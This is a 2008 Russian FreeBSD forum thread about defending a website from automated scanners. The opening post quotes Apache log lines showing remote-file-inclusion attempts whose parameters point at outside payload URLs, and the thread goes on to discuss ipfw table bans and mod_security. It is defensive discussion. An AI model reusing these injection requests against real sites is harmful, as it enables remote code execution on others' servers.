Защита от сканеров

Проблемы установки, настройки и работы Правильной Операционной Системы

Модератор: terminus

Правила форума
Убедительная просьба юзать теги [cоde] при оформлении листингов.
Сообщения не оформленные должным образом имеют все шансы быть незамеченными.
j4ck
проходил мимо

Защита от сканеров

Непрочитанное сообщение j4ck » 2008-10-10 22:26:29

Есть проблема, сканят нещадно сайт вот такой гадостью

Код: Выделить всё

...
69.73.189.182 - - [05/Oct/2008:03:31:29 +0400] "GET /page/5/errors.php?error=http://www.ezy-hosts.com//temp/errors??? HTTP/1.1" 200 626 "-" "libwww-perl/5.79"
72.249.95.130 - - [05/Oct/2008:03:32:15 +0400] "GET /galleria.html.php?mosConfig_absolute_path=http://ctg.su/files/bodo.txt??? HTTP/1.1" 200 630 "-" "libwww-perl/5.805"
62.44.82.234 - - [05/Oct/2008:03:26:25 +0400] "GET /errors.php?error=http://www.stichtingopvangratten.nl/cache/response.txt??? HTTP/1.1" 200 639 "-" "libwww-perl/5.803"
61.80.90.1 - - [05/Oct/2008:03:19:38 +0400] "GET /errors.php?error=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 200 620 "-" "libwww-perl/5.79"
61.80.90.1 - - [05/Oct/2008:03:19:38 +0400] "GET /bans/page/6/errors.php?error=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 200 632 "-" "libwww-perl/5.79"
...
Написал небольшой скрипт, который по крону кладет в бан ip-ы сканеров.
http://www.skillz.ru/dev/freebsd/articl ... erami.html

В фаерволе правило стоит первым
deny ip from table(0) to any

Гадов за 4 дня наловилось достаточно
# ipfw -a list
15111 887563 deny ip from table(0) to any

Щас смотрю
ipfw table 0 list | wc -l

Там записей уже 4500 с копейками. Сильно ли это отражается на производительности сети?
Я так понимаю для каждого пакета нужно пробежаться по таблице и сравнить.
Подскажите как организовать более правильную защиту?

система Free5.5/apache2.2

Хостинговая компания Host-Food.ru
Хостинг HostFood.ru
 

Услуги хостинговой компании Host-Food.ru

Хостинг HostFood.ru

Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/

Аватара пользователя
schizoid
подполковник
Сообщения: 3228
Зарегистрирован: 2007-03-03 17:32:31
Откуда: Украина, Чернигов
Контактная информация:

Re: Защита от сканеров

Непрочитанное сообщение schizoid » 2008-10-10 22:28:19

в таблице поиск идет очень быстро. намного быстрее, чем просто по правилам
ядерный взрыв...смертельно красиво...жаль, что не вечно...

Аватара пользователя
dikens3
подполковник
Сообщения: 4856
Зарегистрирован: 2006-09-06 16:24:08
Откуда: Нижний Новгород
Контактная информация:

Re: Защита от сканеров

Непрочитанное сообщение dikens3 » 2008-10-11 10:18:28

mod_security посмотри и бань по запросам, а не IP. Как правило запросы не меняются.
Лучше установить FreeBSD, чем потратить 30 лет на Linux'ы и выяснить какой из них хуже.

zg
полковник
Сообщения: 5845
Зарегистрирован: 2007-12-07 13:51:33
Откуда: Верх-Нейвинск

Re: Защита от сканеров

Непрочитанное сообщение zg » 2008-10-11 11:29:12

j4ck писал(а):Я так понимаю для каждого пакета нужно пробежаться по таблице и сравнить.
я так думаю там сортированные массивы, по ним любой адрес выбирается за несколько проверок. Тут счёт идёт на единицы скачков по массиву, так что на производительности это не отразится.

Отражается, если в правилах есть домены или me. Просто, одиночные IP на производительность не повлияют.

j4ck
проходил мимо

Re: Защита от сканеров

Непрочитанное сообщение j4ck » 2008-10-11 12:13:00

Спасибо за ответы.
mod_security как-то специфично работал, надо будет с ним еще поковыряться.